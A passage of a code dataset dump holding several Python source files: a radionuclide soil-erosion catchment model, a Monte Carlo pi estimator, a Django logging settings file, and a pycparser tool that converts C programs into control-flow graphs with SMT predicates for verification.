:\n                    if (cell not in added) and (cell not in stack) and cell != current and cell != self :\n                        stack.append(cell)\n                        self.input_cells.append(cell)\n\n    def findOutputCell(self, catchment):\n        max_diff = 0\n        self.output_cell = self.output_cell_storage = None\n        for cell in catchment :\n            if abs(cell.x-self.x) <= 1 and abs(cell.y-self.y) <= 1 and cell.elevation < self.elevation :\n                # keep the steepest downhill neighbour\n                if cell != self and self.elevation - cell.elevation > max_diff :\n                    self.output_cell = cell\n                    self.output_cell_storage = cell\n                    max_diff = self.elevation - cell.elevation\n\n    def findUpWayCells(self, catchment) :\n        stack = [self]\n        added = []\n        while stack :\n            current = stack.pop()\n            added.append(current)\n            for cell in catchment :\n                if cell.output_cell == current :\n                    if (cell not in added) and (cell not in stack) and cell != current and cell != self :\n                        stack.append(cell)\n                        self.up_way_cells.append(cell)\n        self.up_way_cells_storage = self.up_way_cells[:]\n\n    def calculateSoilLoss(self) :\n        if self.land_type != 'w' :\n            self.soil_loss = self.model_R * self.model_K * self.model_LS * self.model_C * self.model_P\n\n    def calculateActivityLoss(self) :\n        if self.land_type != 'w' :\n            for 
isotope in self.isotopes :\n                isotope['top_layer']['activity_loss'] = self.soil_loss * isotope['top_layer']['activity_concentration']\n\n    def __repr__(self):\n        return (\"\\n x=%d; y=%d; h=%d\" % (self.x, self.y, self.elevation))\n\n    def calculate_liquid_outflow(self, w_e=20.0, n_fl=3):\n        full_capacity = 25 + 2*np.random.randn() # 25 l -- volume of soil per 1 sq.m. wetted in the event\n        w_fl = self.w0 + w_e - full_capacity\n        if w_fl < 0 :\n            w_fl = 0\n        for isotope in self.isotopes:\n            if isotope['top_layer']['soluble_part'] > 0 :\n                isotope['top_layer']['liquid_flow'] = n_fl * w_fl * ((isotope['top_layer']['zapas'] * isotope['top_layer']['soluble_part'])/(self.w0 + w_e))\n\n    def infiltration(self):\n        if self.land_type != 'w':\n            for isotop in self.isotopes:\n                isotop['top_layer']['zapas'] -= isotop['infiltration_constant'] * isotop['top_layer']['zapas']\n                isotop['bottom_layer']['zapas'] += isotop['infiltration_constant'] * isotop['top_layer']['zapas']\n                # and liquid flow out\n                isotop['top_layer']['zapas'] -= isotop['top_layer']['liquid_flow']\n\n    def radioactive_decay(self):\n        for isotop in self.isotopes:\n            isotop['top_layer']['zapas'] -= isotop['decay_constant'] * isotop['top_layer']['zapas']\n            isotop['bottom_layer']['zapas'] -= isotop['decay_constant'] * isotop['bottom_layer']['zapas']\n\n    def deposition(self):\n        for isotop in self.isotopes:\n            isotop['top_layer']['zapas'] += isotop['inflow']\n            isotop['inflow'] = 0\n\n    def recalculation_activity_concentration(self):\n        if self.land_type != 'w':\n            for isotop in self.isotopes:\n                isotop['top_layer']['activity_concentration'] = isotop['top_layer']['zapas'] / (self.size**2 *self.soil_density*(0.2*10*10))\n                isotop['bottom_layer']['activity_concentration'] = isotop['bottom_layer']['zapas'] / (self.size**2 *self.soil_density*(1.8*10*10))\n                isotop['top_layer']['soluble_zapas'] = isotop['top_layer']['soluble_part'] * isotop['top_layer']['zapas']\n\n    def year_redistribution(self):\n        self.infiltration()\n        self.deposition()\n        self.radioactive_decay()\n        self.recalculation_activity_concentration()\n\nclass CatchmentArea():\n    '''\n    Class describing the catchment as a whole; contains catchment -- a list with the individual model cells.\n    Contains the functions that prepare the cells for the runoff calculation and the runoff calculation functions themselves.\n    '''\n    def __init__(self, datafile=datafile):\n        self.catchment = []\n        with open(datafile) as f:\n            reader = csv.reader(f)\n            for row in reader:\n                SC = SoilCell(int(row[0]), int(row[1]), float(row[2]), str(row[3]), float(row[4]), float(row[5]), cs137_s_part=float(row[6]), w0=float(row[7]))\n                self.catchment.append(SC)\n\n        for cell in self.catchment :\n            cell.findOutputCell(self.catchment)\n        for cell in self.catchment :\n            cell.findUpWayCells(self.catchment)\n        for cell in self.catchment:\n            cell.calculateAngle()\n            cell.calculateLS()\n            cell.calculateSoilLoss()\n            cell.calculate_max_outflow_capacity()\n\n    def sediment_flow(self):\n        flow_run = True\n        while flow_run:\n            flow_run = False\n            for sc in self.catchment:\n                if len(sc.up_way_cells) == 0 and sc.output_cell != None and sc.land_type != 'w':\n                    if sc.sediment_inflow + sc.soil_loss < sc.max_outflow_capacity:\n                        outflow = sc.sediment_inflow + sc.soil_loss\n                        for isotope, output_isotope in zip(sc.isotopes, sc.output_cell.isotopes):\n                            temp_isotop = isotope['inflow'] + sc.soil_loss * isotope['top_layer']['activity_concentration']\n                            output_isotope['inflow'] += temp_isotop\n                            isotope['top_layer']['zapas'] -= temp_isotop\n                        sc.sediment_inflow = 0\n                    else:\n                        outflow = sc.max_outflow_capacity\n                        for isotope, output_isotope in 
zip(sc.isotopes, sc.output_cell.isotopes):\n                            if sc.soil_loss > sc.max_outflow_capacity or sc.sediment_inflow < 0.001:\n                                temp_isotop = sc.max_outflow_capacity * isotope['top_layer']['activity_concentration']\n                            else:\n                                temp_isotop = sc.soil_loss * isotope['top_layer']['activity_concentration'] + (sc.max_outflow_capacity - sc.soil_loss) * isotope['inflow']/sc.sediment_inflow\n                            output_isotope['inflow'] += temp_isotop\n                            isotope['top_layer']['zapas'] -= temp_isotop\n                        sc.sediment_inflow -= sc.max_outflow_capacity\n                    sc.output_cell.sediment_inflow += outflow\n                    sc.output_cell.up_way_cells.remove(sc)\n                    sc.output_cell = None\n                    flow_run = True\n\n    def one_season_flow(self):\n        for cell in self.catchment :\n            cell.sediment_inflow = 0 # zero out the transferred soil mass here before it is counted\n        w_e = 2*np.random.randn() + 20\n        n_fl = 0.5*np.random.randn() + 2\n        n_fl = n_fl if n_fl > 0.5 else 0.5\n        for cell in self.catchment :\n            cell.calculate_liquid_outflow(w_e, n_fl)\n        self.sediment_flow()\n        for cell in self.catchment :\n            cell.year_redistribution()\n            cell.up_way_cells = cell.up_way_cells_storage[:]\n            if cell.output_cell_storage :\n                cell.output_cell = cell.output_cell_storage\n\n    def calculate_pond_accumulation(self):\n        sum_cs = 0\n        sum_am = 0\n        sum_lq = 0\n        sed = 0\n        for cell in self.catchment:\n            if cell.land_type == 'w':\n                sed += cell.sediment_inflow\n                sum_cs += cell.isotopes[0]['top_layer']['zapas']\n                sum_am += cell.isotopes[1]['top_layer']['zapas']\n            else:\n                sum_lq += cell.isotopes[0]['top_layer']['liquid_flow']\n        return sed, sum_cs, sum_lq, sum_am\n\n    def one_iteration(self, iteration=0, outfil=outfile):\n        self.one_season_flow()\n        mod_data = self.calculate_pond_accumulation()\n        out_string = '%d,%.3e,%.2e,%.2e,%.2e\\n' % (iteration, mod_data[0], mod_data[1], mod_data[2], mod_data[3])\n        with open(outfil, 'a') as outfl:\n            outfl.write(out_string)\n\n    def many_iterations(self, period, outfil=outfile):\n        dissolved_cs137 = 0\n        dissolved_am241 = 0\n        sediments = 0\n        for i in range(period):\n            self.one_season_flow()\n            mod_data = self.calculate_pond_accumulation()\n            dissolved_cs137 += mod_data[2]\n            dissolved_cs137 -= cs137_decay_constant * dissolved_cs137\n            ##dissolved_am241 += mod_data[3]\n            sediments += mod_data[0]\n            mod_data = self.calculate_pond_accumulation()\n\n        out_string = '%d,%.3e,%.2e,%.2e,%.2e\\n' % (i, sediments, mod_data[1], dissolved_cs137, mod_data[3])\n        with open(outfil, 'a') as outfl:\n            outfl.write(out_string)\n\nif __name__ == '__main__':\n    #try :\n    print(sys.argv[1])\n    n_iterations = int(sys.argv[2])\n    if sys.argv[1] == '1':\n        with open(outfile, 'w') as outfl:\n            outfl.write('iteration,solid_sediment_kg,solid_cs137_Bq,liquid_cs137_bq,solid_am241_bq\\n')\n        for i in tqdm_notebook(range(n_iterations)):\n            catchment = CatchmentArea()\n            catchment.one_iteration(i)\n    else:\n        #try:\n        period = int(sys.argv[1])\n        with open(outfile, 'w') as outfl:\n            outfl.write('iteration,solid_sediment_kg,solid_cs137_Bq,liquid_cs137_bq,solid_am241_bq\\n')\n        for i in range(n_iterations):\n            catchment = CatchmentArea()\n            catchment.many_iterations(period)\n        #except:\n        #    print(\"Can't interpret period {}\".format(sys.argv[1]))\n    #except :\n    #    print('RTFM')\n","repo_name":"nikitinale/lateral_psrer","sub_path":"model_double.py","file_name":"model_double.py","file_ext":"py","file_size_in_byte":14448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"16794830556","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#Estimate value of Pi\n\nimport numpy as np\nimport math\nimport 
random\nimport matplotlib.pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[2]:\n\n\n#Now lets initialize square size and no. of points inside square and circle\n\nsquare_size = 1\npoints_inside_circle = 0\npoints_inside_square = 0\nsample_size = 1000\narc = np.linspace(0,np.pi/2,100)\n\n\n# In[3]:\n\n\n#define the function that generates random points inside square\n\ndef generate_points(size):\n    x = random.random()*size\n    y = random.random()*size\n    return(x,y)\n\n\n# In[4]:\n\n\n#define a function to check if a point falls within circle\ndef is_in_circle(point,size):\n    return math.sqrt(point[0]**2+point[1]**2)<=size\n\n\n# In[6]:\n\n\n#define a function for calculating pi value\n\ndef compute_pi(points_inside_circle,points_inside_square):\n    return 4*(points_inside_circle/points_inside_square)\n\n\n# In[8]:\n\n\nplt.axes().set_aspect('equal')\nplt.plot(1*np.cos(arc), 1*np.sin(arc))\n\nfor i in range(sample_size):\n    point = generate_points(square_size)\n    plt.plot(point[0],point[1],'c.')\n    points_inside_square +=1\n    if is_in_circle(point,square_size):\n        points_inside_circle +=1\n\n\n# In[9]:\n\n\nprint('Approx value of pi is {}'.format(compute_pi(points_inside_circle,points_inside_square)))\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"anuraj76/Python-Programming","sub_path":"MonteCarlo Basic Understanding.py","file_name":"MonteCarlo Basic Understanding.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"3695009308","text":"import os\n\n\n# Project encoding\nENCODING = \"utf-8\"\n\n# Keys used in the logging protocol\nROOT = os.getcwd()\nDIR_LOG = \"logs\"\n\nLOG_DIRECTORY = os.path.join(ROOT, DIR_LOG)\nLOG_FILENAME = os.path.join(LOG_DIRECTORY, \"app.log\")\n\nLOGGER_NAME = __name__\n\nWHEN_INTERVAL = \"D\"\n\n# Eye candy\nINDENT = 30 * \"-\"","repo_name":"halexx7/DJ_uk_newcity","sub_path":"newcity/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"5625894000","text":"import sys\nfrom pycparser import *\nimport pycparser\nfrom typing import *\n\nimport treeutil\nimport util\nfrom graphviz import Digraph\nimport logging\nlogging.basicConfig(level=logging.WARNING)\nimport smtutil\n\nFORCE_NOMERGE = False\n\ndef is_error_function(x: str) -> bool:\n    if x == \"errorFn\":\n        return True\n    if x.startswith(\"__VERIFIER_error\"):\n        return True\n    return False\n\ndef is_assumption(x: str) -> bool:\n    return x in [\"assume\", \"__VERIFIER_assume\"]\n\n\ndef is_assertion(x: str) -> bool:\n    return x in [\"assert\", \"__VERIFIER_assert\"]\n\n\ndef is_nondet(x: str) -> bool:\n    if x.startswith(\"unknown\"):\n        return True\n    return False\n\n\ndef is_nondet_int(x: str) -> bool:\n    if x.startswith(\"__VERIFIER_nondet_int\") or x.startswith(\"__VERIFIER_nondet_bool\") or x == \"rand\" or x == \"nondet\":\n        return True\n    return False\n\n\ndef is_nondet_unsigned(x: str) -> bool:\n    if x.startswith(\"__VERIFIER_nondet_uint\"):\n        return True\n    return False\n\ndef is_ignoring_function_name(x: str) -> bool:\n    return is_error_function(x) or is_nondet(x) or is_nondet_int(x) or is_assumption(x) or is_assertion(x) or is_nondet_unsigned(x) or x.startswith(\"__VERIFIER_nondet\") or x == \"__mark\"\n\nclass CFGVar():\n    def __init__(self,\n                 name: str,\n                 typ: str) -> None:\n        self.name: str = name\n        self.typ: str = typ\n    def __eq__(self, opponent):\n        return 
self.name == opponent.name and self.typ == opponent.typ\n def __hash__(self):\n return hash((self.name, self.typ))\n\n# nesting of (type: str, value of str or CFGValue, ...)\nclass CFGValue():\n def __init__(self, x: Any = None):\n if x is None:\n x = (\"Constant\", \"true\", \"bool\")\n self.val: Any = x\n def __str__(self):\n if self.val[0] == \"Nondet\":\n return \"ND\"\n elif self.val[0] == \"Constant\":\n return self.val[1]\n elif self.val[0] == \"NondetInt\":\n return \"*nondetint\"\n elif self.val[0] == \"NondetUnsigned\":\n return \"*nondetunsigned\"\n elif self.val[0] == \"Var\":\n return self.val[1]\n elif self.val[0] == \"Unary\":\n return f\"{self.val[1]} {self.val[2]}\"\n elif self.val[0] == \"Binary\":\n return f\"{self.val[2]} {self.val[1]} {self.val[3]}\"\n else:\n raise Exception(\"Unexpected formula\")\n\nclass Operation:\n pass\n\nclass OperationBin(Operation):\n def __init__(self, lhs_: str, rhs_: CFGValue, op_: str):\n self.lhs: str = lhs_\n self.rhs: CFGValue = rhs_\n self.op: str = op_\n def __str__(self) -> str:\n return f\"{self.lhs} {self.op} {self.rhs}\"\n\nclass OperationUni(Operation):\n def __init__(self, v_: str, op: str):\n self.v = v_\n self.op = op\n def __str__(self) -> str:\n if self.op == \"p++\":\n return f\"{self.v}++\"\n elif self.op == \"p--\":\n return f\"{self.v}--\"\n elif self.op == \"++\":\n return f\"++{self.v}\"\n elif self.op == \"--\":\n return f\"--{self.v}\"\n else:\n return f\"????\"\n\nclass CFGNode():\n def __init__(self, id_: int):\n self.id: int = id_\n self.coming: Set[CFGEdge] = set()\n self.going: Set[CFGEdge] = set()\n def __str__(self):\n return f\"N{self.id}\"\n\nclass CFGEdge():\n def __init__(self,\n id_: int,\n source_: CFGNode,\n target_: CFGNode,\n pred_: CFGValue,\n op_: Optional[OperationBin]):\n self.id = id_\n self.source: CFGNode = source_\n self.target: CFGNode = target_\n self.condition: CFGValue = pred_\n self.operation: Optional[OperationBin] = op_\n self.pred: util.Tree = None\n self.vars: List[str] = []\n def __str__(self):\n s = \"\"\n if self.condition.val == (\"Constant\", \"true\", \"bool\"):\n pass\n else:\n s = f\"[{str(self.condition)}]\"\n t = \"\"\n if self.operation is not None:\n t = str(self.operation)\n return f\"{self.id})\" + s + t\n def get_predicate_as_str(self):\n return util.debug_print_list(self.pred)\n\n\nclass GotoManager:\n def __init__(self):\n self.sources: Set[CFGNode] = set()\n self.target: Optional[CFGNode] = None\n def swap(self, a: CFGNode, b: CFGNode):\n if a in self.sources:\n self.sources.remove(a)\n self.sources.add(b)\n if self.target == a:\n self.target = b\n\nclass ControlFlowGraph():\n def __init__(self):\n self.initial: CFGNode = CFGNode(0)\n self.final: CFGNode = CFGNode(1)\n self.exit: CFGNode = self.initial\n self.nodes: List[CFGNode] = [self.initial, self.final]\n self.edges: List[CFGEdge] = []\n self.vars: Set[CFGVar] = set()\n def get_vars_as_dict(self) -> Dict[str, str]:\n return dict([(x.name, x.typ) for x in self.vars])\n def add_edge(self,\n src: CFGNode,\n tgt: Optional[CFGNode],\n cond: CFGValue,\n op: Optional[Operation]) -> Tuple[CFGEdge, CFGNode]:\n assert op is None or isinstance(op, Operation)\n assert self.nodes[src.id] == src\n if tgt is not None:\n assert self.nodes[tgt.id] == tgt\n if tgt is None:\n tgt = CFGNode(len(self.nodes))\n self.nodes.append(tgt)\n assert self.nodes[tgt.id] == tgt\n e = CFGEdge(len(self.edges), src, tgt, cond, op)\n e.source = src\n e.target = tgt\n e.condition = cond\n e.operation = op\n src.going.add(e)\n tgt.coming.add(e)\n 
self.edges.append(e)\n return e, tgt\n def remove_edge(self, e: CFGEdge) -> None:\n assert self.edges[e.id] == e\n e.source.going.remove(e)\n e.target.coming.remove(e)\n\n # for n in self.nodes[e.id:]:\n # n.id -= 1\n self.edges.remove(e)\n for i, n in enumerate(self.nodes):\n n.id = i\n for i, e in enumerate(self.edges):\n e.id = i\n def remove_node(self, n: CFGNode) -> None:\n assert self.nodes[n.id] == n\n assert n != self.initial\n assert False\n\n def print(self, name=\"print\", style=\"c\") -> None:\n G = Digraph(format=\"png\")\n\n for n in self.nodes:\n # logging.debug(f\"node from {n.id}\")\n if n == self.initial:\n G.node(str(n.id), f\"ENTRY\")\n elif n == self.final:\n G.node(str(n.id), f\"ERROR\")\n else:\n G.node(str(n.id), f\"N{n.id}\")\n for e in self.edges:\n # logging.debug(f\"edge from {e.source.id} to {e.target.id}\")\n if style == \"c\":\n s = str(e)\n elif style == \"pred\":\n s = e.get_predicate_as_str()\n G.edge(str(e.source.id), str(e.target.id), s, fontsize=\"8\")\n G.render(name)\n def _check_consistency(self):\n # coming\n comings: Dict[CFGNode, Set[CFGEdge]] = {x: set() for x in self.nodes}\n for e in self.edges:\n comings[e.target].add(e)\n for n in self.nodes:\n assert comings[n] == n.coming\n # going\n goings: Dict[CFGNode, Set[CFGEdge]] = {x: set() for x in self.nodes}\n for e in self.edges:\n goings[e.source].add(e)\n for n in self.nodes:\n assert goings[n] == n.going\n # edge -> node -> edge consitency\n for e in self.edges:\n assert e in e.source.going\n assert e in e.target.coming\n # node -> edge -> node consistency\n for n in self.nodes:\n for e in n.going:\n assert n == e.source\n for e in n.coming:\n assert n == e.target\n def _make_pred_edge(self, cfg_edge: CFGEdge, theory: str, bitwidth: int) -> Tuple[util.Tree, List[str]]:\n \"\"\"Converts the operations in C to LIA formulae.\"\"\"\n cfg_ = self\n vars = []\n unary_trans = {\"!\": \"not\"}\n binary_trans = {\"==\": \"=\", \"||\": \"or\", \"&&\": \"and\", \"/\": \"div\"}\n def trans(x: str, trans: Dict[str, str]):\n if x in trans:\n return trans[x]\n return x\n integers = [\"int\", \"unsigned\"]\n type2bits = {\"int\": bitwidth, \"unsigned\": bitwidth}\n var2ctype = dict({x.name: x.typ for x in cfg_.vars})\n def get_type(x: Any) -> str:\n if x.val[0] == \"Constant\":\n if x.val[2] in type2bits:\n return \"int\"\n # return x.val[2]\n elif x.val[2] == \"bool\":\n return \"bool\"\n else:\n raise Exception(f\"Unsupported type {x.val[2]}\")\n elif x.val[0] == \"Var\":\n varname = x.val[1]\n return var2ctype[varname]\n elif x.val[0] == \"Nondet\":\n return \"bool\"\n elif x.val[0] == \"NondetInt\":\n return \"int\"\n elif x.val[0] == \"NondetUnsigned\":\n return \"unsigned\"\n elif x.val[0] == \"Unary\":\n ty = get_type(x.val[2])\n if x.val[1] == \"!\":\n return \"bool\"\n elif x.val[1] == \"-\":\n return \"int\"\n else:\n assert False\n elif x.val[0] == \"Binary\":\n # temporarily\n lt = get_type(x.val[2])\n rt = get_type(x.val[3])\n if lt == \"Var\":\n lt = var2ctype[x.val[2][1]]\n if rt == \"Var\":\n rt = var2ctype[x.val[3][1]]\n if x.val[1] in [\"==\", \"!=\"]:\n if lt == rt or (lt in integers and rt in integers):\n pass\n else:\n raise Exception(\"Type mismatch\")\n return \"bool\"\n elif x.val[1] in [\"<=\", \"<\", \">\", \">=\"]:\n if lt in integers and rt in integers:\n pass\n else:\n raise Exception(\"Values have to be int in inequalities\")\n return \"bool\"\n elif x.val[1] in [\"||\", \"&&\"]:\n return \"bool\"\n elif x.val[1] in [\"+\", \"*\", \"-\", \"/\", \"%\"]:\n if lt in integers and rt 
in integers:\n                    pass\n                else:\n                    raise Exception(\"Values have to be int\")\n                return \"int\"\n            else:\n                raise Exception(f\"Unexpected operator {x.val[1]}\")\n        else:\n            assert False\n        def int_to_bool(t) -> Any:\n            return [\"not\", [\"=\", t, 0]]\n        def bool_to_int(t) -> Any:\n            if type(t) is str and treeutil.undecorate(t)[0] in var2ctype:\n                return t\n            elif type(t) is list:\n                tag = t[0]\n                if tag in [\"true\", True]:\n                    assert len(t) == 1\n                    return 1\n                elif tag in [\"false\", False]:\n                    assert len(t) == 1\n                    return 0\n                elif tag == \"not\":\n                    assert len(t) == 2\n                    return [\"-\", 1, bool_to_int(t[1])]\n                elif tag == \"=\":\n                    assert len(t) == 3\n                    if t[2] in [\"0\", 0]:\n                        return [\"-\", 1, bool_to_int(t[1])]\n                    elif t[1] in [\"0\", 0]:\n                        return [\"-\", 1, bool_to_int(t[2])]\n                    else:\n                        assert False\n                else:\n                    raise Exception(f\"Unsupported boolean assignment: {t}\")\n            else:\n                assert False\n        def ite(cond: Any, t: Any, f: Any) -> Any:\n            return [\"ite\", cond, t, f]\n            # return [\"and\", [\"=>\", cond, t], [\"=>\", [\"not\", cond], f]]\n        def helper(x: Any) -> Any:\n            if x.val[0] == \"Constant\":\n                if x.val[2] in [\"bool\"] + integers:\n                    if util.re_hex.match(x.val[1]) is not None:\n                        return int(x.val[1], 16)\n                    elif x.val[1].lstrip(\"+-\").isnumeric():\n                        return int(x.val[1])\n                    elif x.val[1] in [\"true\", \"false\"]:\n                        return x.val[1]\n                    else:\n                        assert False\n                else:\n                    assert False\n            elif x.val[0] == \"Var\":\n                v = treeutil.decorate(x.val[1], 0)\n                vars.append(v)\n                return v\n            elif x.val[0] == \"NondetInt\":\n                return \"*nondetint\"\n            elif x.val[0] == \"NondetUnsigned\":\n                return \"*nondetunsigned\"\n            elif x.val[0] == \"Nondet\":\n                return \"true\"\n            elif x.val[0] == \"Unary\":\n                op = trans(x.val[1], unary_trans)\n                if op in [\"-\", \"not\"]:\n                    ty = get_type(x.val[2])\n                    if op == \"not\":\n                        if ty in integers:\n                            return [\"not\", int_to_bool(helper(x.val[2]))]\n                        elif ty == \"bool\":\n                            return [\"not\", helper(x.val[2])]\n                        else:\n                            assert False\n                    elif op == \"-\":\n                        return [op, helper(x.val[2])]\n                    else:\n                        assert False\n                else:\n                    assert False\n                    logging.warning(\"Unexpected unary symbol \" + str(op))\n                    return [op, helper(x.val[2])]\n            elif x.val[0] == \"Binary\":\n                if x.val[1] in [\"+\", \"-\", \"*\", \"div\", \"<=\", \">=\", \"<\", \">\", \"==\"] or x.val[1] in binary_trans:\n                    left_sub = helper(x.val[2])\n                    right_sub = helper(x.val[3])\n                    op = binary_trans.get(x.val[1], x.val[1])\n                    if op in [\"and\", \"or\"]:\n                        left_sub = int_to_bool(left_sub) if get_type(x.val[2]) in integers else left_sub\n                        right_sub = int_to_bool(right_sub) if get_type(x.val[3]) in integers else right_sub\n                    return [op, left_sub, right_sub]\n                elif x.val[1] == \"!=\":\n                    return [\"not\", [\"=\", helper(x.val[2]), helper(x.val[3])]]\n                elif x.val[1] == \"%\":\n                    return [\"mod\", helper(x.val[2]), helper(x.val[3])]\n                else:\n                    assert False\n                    logging.warning(\"Unexpected symbol \" + str(x.val[1]))\n                    return [x.val[1], helper(x.val[2]), helper(x.val[3])]\n            else:\n                raise Exception(\"Unexpected predicate \" + str(x))\n        slist_cond = helper(cfg_edge.condition)\n\n        if get_type(cfg_edge.condition) in integers:\n            slist_cond = int_to_bool(slist_cond)\n        if cfg_edge.operation is None:\n            res = slist_cond\n        else:\n            if isinstance(cfg_edge.operation, OperationBin):\n                slist_upd_rhs = helper(cfg_edge.operation.rhs)\n                var_upd_lhs = treeutil.decorate(cfg_edge.operation.lhs, 1)\n                type_left = var2ctype[cfg_edge.operation.lhs]\n                type_right = get_type(cfg_edge.operation.rhs)\n                if type_left in integers and type_right in integers:\n                    pass\n                elif type_left in integers and type_right == \"bool\":\n                    slist_upd_rhs = 
bool_to_int(slist_upd_rhs)\n else:\n raise Exception(\"Mismatched type in assignment\")\n vars.append(var_upd_lhs)\n if cfg_edge.operation.op == \"=\":\n slist_upd = [\"=\", var_upd_lhs, slist_upd_rhs]\n elif cfg_edge.operation.op in [\"+=\", \"-=\", \"*=\"]:\n var_cur_lhs = treeutil.decorate(cfg_edge.operation.lhs, 0)\n slist_upd = [\"=\", var_upd_lhs, [cfg_edge.operation.op[0], var_cur_lhs, slist_upd_rhs]]\n else:\n raise Exception(f\"Unexpected type of assignment {cfg_edge.operation.op}\")\n elif isinstance(cfg_edge.operation, OperationUni):\n slist_upd_rhs = treeutil.decorate(cfg_edge.operation.v, 0)\n var_upd_lhs = treeutil.decorate(cfg_edge.operation.v, 1)\n if cfg_edge.operation.op == \"p++\":\n slist_upd = [\"=\", var_upd_lhs, [\"+\", slist_upd_rhs, 1]]\n elif cfg_edge.operation.op == \"p--\":\n slist_upd = [\"=\", var_upd_lhs, [\"-\", slist_upd_rhs, 1]]\n elif cfg_edge.operation.op == \"++\":\n slist_upd = [\"=\", var_upd_lhs, [\"+\", slist_upd_rhs, 1]]\n elif cfg_edge.operation.op == \"--\":\n slist_upd = [\"=\", var_upd_lhs, [\"-\", slist_upd_rhs, 1]]\n else:\n raise Exception(f\"Non supported op {cfg_edge.operation.op}\")\n else:\n raise Exception(f\"Unspported Operation {cfg_edge.operation}\")\n res = [\"and\", slist_upd, slist_cond]\n assert res != []\n if theory == \"liabv\":\n replaced = treeutil.replace_symbols_for_bv(res, 2 ** bitwidth, \"depends\", var2ctype)\n elif theory == \"lia\":\n replaced = res\n else:\n assert False\n return replaced, vars\n def make_predicates(self, theory: str, bitwidth: int):\n for e in self.edges:\n p, v = self._make_pred_edge(e, theory, bitwidth)\n e.pred = p\n e.vars = v\n\n\n\n\ndef join_CFG(\n cfg1: ControlFlowGraph,\n cfg2: ControlFlowGraph,\n source_: Optional[CFGNode] = None,\n target_: Optional[CFGNode] = None,\n cond: CFGValue = None,\n goto_dict: Dict[str, GotoManager] = None,\n returns: Set[CFGNode] = None) -> ControlFlowGraph:\n # process source and target\n source = source_ if source_ is not None else cfg1.exit\n target = target_ if target_ is not None else cfg2.initial\n # stop if cfg1 is dying\n # if cfg1.exit == cfg1.final:\n # return cfg1\n # is merge mode on?\n if cond is None:\n merge_mode = True\n cond = CFGValue()\n else:\n merge_mode = False\n # disable merging if it is related to jump\n for k, v in goto_dict.items():\n if target in v.sources:\n merge_mode = False\n break\n if target == v.target:\n merge_mode = False\n break\n if target in returns:\n merge_mode = False\n merge_mode = merge_mode and (not FORCE_NOMERGE)\n # move nodes from cfg2 to cfg1 (rename ids)\n # cfg1.nodes.append(cfg2.nodes[0])\n # cfg1.nodes[-1].id = len(cfg1.nodes) - 1\n # assert cfg1.nodes[cfg1.nodes[-1].id] == cfg1.nodes[-1]\n for n in cfg2.nodes: # exclude cfg2's final\n if merge_mode and n == target:\n logging.debug(f\"skipping {n.id}\")\n continue\n if n == cfg2.final:\n continue\n if n in cfg1.nodes:\n continue\n cfg1.nodes.append(n)\n cfg1.nodes[-1].id = len(cfg1.nodes) - 1\n assert cfg1.nodes[cfg1.nodes[-1].id] == cfg1.nodes[-1]\n # move edges from cfg2 to cfg1\n for e in cfg2.edges:\n if e in cfg1.edges:\n continue\n e.id = len(cfg1.edges)\n cfg1.edges.append(e)\n # convert the edges of (cfg2's init)->* to (cfg1's exit)->* preserving conditions\n # for e in cfg2.edges:\n # if e.source == cfg2.initial:\n # e.source = cfg1.exit\n # cfg1.exit.coming.add(e)\n if merge_mode:\n for e in cfg2.edges:\n if e.source == target:\n e.source = source\n source.going.add(e)\n if e.target == target:\n e.target = source\n source.coming.add(e)\n else:\n # 
connect from source to target\n cfg1.add_edge(source, target, cond, None)\n # merge cfg2's final into cfg1's final\n for e in cfg2.edges:\n if e.target == cfg2.final:\n e.target = cfg1.final\n cfg1.final.coming.add(e)\n # change exit\n if merge_mode and target == cfg2.exit:\n pass\n else:\n if cfg2.exit == cfg2.final:\n cfg1.exit = cfg1.final\n else:\n cfg1.exit = cfg2.exit\n # merge variables\n cfg1.vars.update(cfg2.vars)\n # assertion\n if cfg2.final == cfg2.exit:\n assert cfg1.final == cfg1.exit\n # change gotos\n if merge_mode:\n for k, v in goto_dict.items():\n v.swap(target, source)\n # change returns\n if merge_mode and target in returns:\n returns.remove(target)\n returns.add(source)\n return cfg1\n\ndef join_CFGs(cfgs: List[Optional[ControlFlowGraph]], goto_dict: Dict[str, GotoManager], returns: Set[CFGNode]) -> ControlFlowGraph:\n cfgs1: List[ControlFlowGraph] = [c for c in cfgs if c is not None]\n cfg = cfgs1[0]\n for c in cfgs1[1:]:\n cfg = join_CFG(cfg, c, None, None, None, goto_dict, returns)\n return cfg\n\ndef parse_exp(p: pycparser.c_ast.Node, pre: str = \"\") -> CFGValue:\n if type(p) is pycparser.c_ast.Constant:\n return CFGValue((\"Constant\", p.value, p.type))\n elif type(p) is pycparser.c_ast.ID:\n return CFGValue((\"Var\", pre + p.name))\n elif type(p) is pycparser.c_ast.UnaryOp:\n u: pycparser.c_ast.UnaryOp = p\n ex = parse_exp(u.expr, pre)\n if ex.val[0] == \"Nondet\":\n return CFGValue((\"Nondet\", ))\n return CFGValue((\"Unary\", u.op, ex))\n elif type(p) is pycparser.c_ast.BinaryOp:\n b: pycparser.c_ast.BinaryOp = p\n left = parse_exp(b.left, pre)\n right = parse_exp(b.right, pre)\n if left.val[0] == \"Nondet\" or left.val[0] == \"Nondet\":\n return CFGValue((\"Nondet\",))\n return CFGValue((\"Binary\", b.op, left, right))\n elif type(p) is pycparser.c_ast.FuncCall:\n fc: pycparser.c_ast.FuncCall = p\n if is_nondet(fc.name.name):\n return CFGValue((\"NondetInt\", ))\n elif is_nondet_int(fc.name.name):\n return CFGValue((\"NondetInt\", ))\n elif is_nondet_unsigned(fc.name.name):\n return CFGValue((\"NondetUnsigned\", ))\n else:\n raise Exception(f\"Unexpected function invoke: {fc}\")\n elif p is None:\n return CFGValue((\"Constant\", \"true\", \"bool\"))\n else:\n raise Exception(f\"Unexpected Operation: {p}\")\n\nclass BreakManager:\n def __init__(self):\n self.cnt = 0\n self.stack = []\n def push(self):\n s = f\"*dummy_break_{self.cnt}\"\n self.cnt += 1\n self.stack.append(s)\n return s\n def pop(self):\n return self.stack.pop()\n def get_top(self):\n return 